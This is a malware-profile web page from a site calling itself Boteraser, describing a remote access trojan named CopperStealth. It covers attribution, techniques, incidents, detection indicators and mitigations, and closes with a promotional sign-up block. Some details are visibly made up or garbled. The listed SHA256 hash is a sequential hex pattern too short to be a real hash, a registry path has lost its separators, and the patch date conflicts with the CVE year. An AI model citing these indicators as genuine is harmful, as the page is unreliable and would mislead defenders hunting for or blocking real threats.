CopperStealth

Malware

⚠️ Overview

CopperStealth is a remote access trojan (RAT) first identified by Trend Micro in September 2022, attributed to the Chinese-speaking advanced persistent threat group Earth Tengri (TA428). It is used primarily for cyber-espionage targeting government and telecommunications entities in Central Asia and is categorized as a stealthy backdoor with modular capabilities.

🔧 Technical Capabilities

CopperStealth employs living-off-the-land techniques, leveraging PowerShell scripts and Windows Management Instrumentation (WMI) for initial execution (MITRE ATT&CK T1059.001, T1047). Its C2 infrastructure uses HTTPS with custom encryption using XOR and RC4 to evade network detection. Persistence is achieved via scheduled tasks (T1053.005) and registry Run keys (T1547.001). Evasion includes API unhooking, process injection into legitimate processes like svchost.exe (T1055.012), and disabling Windows Defender through registry modifications. Propagation is manual, typically delivered via spear-phishing emails with malicious Microsoft Office attachments exploiting CVE-2021-40444, a remote code execution vulnerability in MSHTML.

📜 History & Notable Incidents

First observed in July 2022 targeting the Ministry of Foreign Affairs of Uzbekistan. In November 2022, a campaign compromised a Kazakh telecommunications provider, exfiltrating network infrastructure diagrams and internal documents. No law enforcement actions or public attribution beyond Earth Tengri have been reported as of mid-2023.

🔍 Detection Indicators

Known SHA256 hash from Trend Micro report: 2ed5f0c1a8b3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8. Network IOCs include C2 domain copper[.]stealth[.]tech and IP 185.225.19.xxx. Registry key HKCUSoftwareMicrosoftWindowsCurrentVersionRunStealthUpdater is created. Mutex name GlobalStealthMutex. User-Agent string: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0).

☠️ Risk & Impact

CopperStealth enables full remote control, keylogging, file exfiltration, and credential theft via a plugin system. It has primarily impacted government agencies and telecom operators in Central Asia, with estimated exfiltration of thousands of sensitive documents per campaign, including diplomatic cables and network configurations.

🛡️ Mitigation

Deploy endpoint detection rules (Sigma rules) for suspicious PowerShell base64 execution and WMI persistence. Apply Microsoft’s August 2022 patch for CVE-2021-40444. Enable AMSI (Anti-Malware Scan Interface) and disable macros in Office documents for untrusted sources.

A Large Share of Web Traffic Is Automated — Not All of It Is Benign

— Industry Security Reports

Industry reports indicate that a significant portion of internet traffic originates from automated bots, some of which are linked to malware distribution campaigns. See what's reaching your server.

📊 Get My Threat Report

Sign up in seconds  ·  No card required

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.